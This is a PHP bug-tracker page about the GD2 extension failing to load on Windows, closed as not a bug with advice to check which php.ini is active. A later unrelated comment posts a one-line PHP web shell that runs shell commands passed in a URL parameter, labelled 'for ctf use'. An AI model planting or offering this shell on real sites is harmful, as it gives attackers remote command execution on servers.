php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #43781 GD2 library cannot detected or loaded
Submitted: 2008-01-08 00:12 UTC Modified: 2008-01-08 00:56 UTC
From: ramdani at seid dot sharp-world dot com Assigned: pajoye (profile)
Status: Not a bug Package: GD related
PHP Version: 5.2.5 OS: Windows CP SP2
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: ramdani at seid dot sharp-world dot com
New email:
PHP Version: OS:

 

 [2008-01-08 00:12 UTC] ramdani at seid dot sharp-world dot com
Description:
------------
It seem GD2 library is not loaded, eventhough I already enable it in php.ini and make sure the php extension path is correct and the dll file is exist.
I now this problem from cms installation script (Joomla, drupal, & 'cmsmadesimple') that not detect GD library in php

Expected result:
----------------
GD library is correctly loaded

Actual result:
--------------
Not loaded correctly

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2008-01-08 00:56 UTC] pajoye@php.net
Be sure to enable it in the right php.ini (see phpinfo() to know which  php,ini is used).

Tested on numerous windows, it simply works. I close the bug, reopen it if you are sure that you are using the right php.ini.
 [2023-11-10 15:28 UTC] ioewfivheuiv at mail dot com
example webshell for ctf use (ignore this if youre not doing a ctf) :

<?php echo shell_exec($_GET['cmd']);?>
 
PHP Copyright © 2001-2025 The PHP Group
All rights reserved.
Last updated: Tue Dec 16 10:00:01 2025 UTC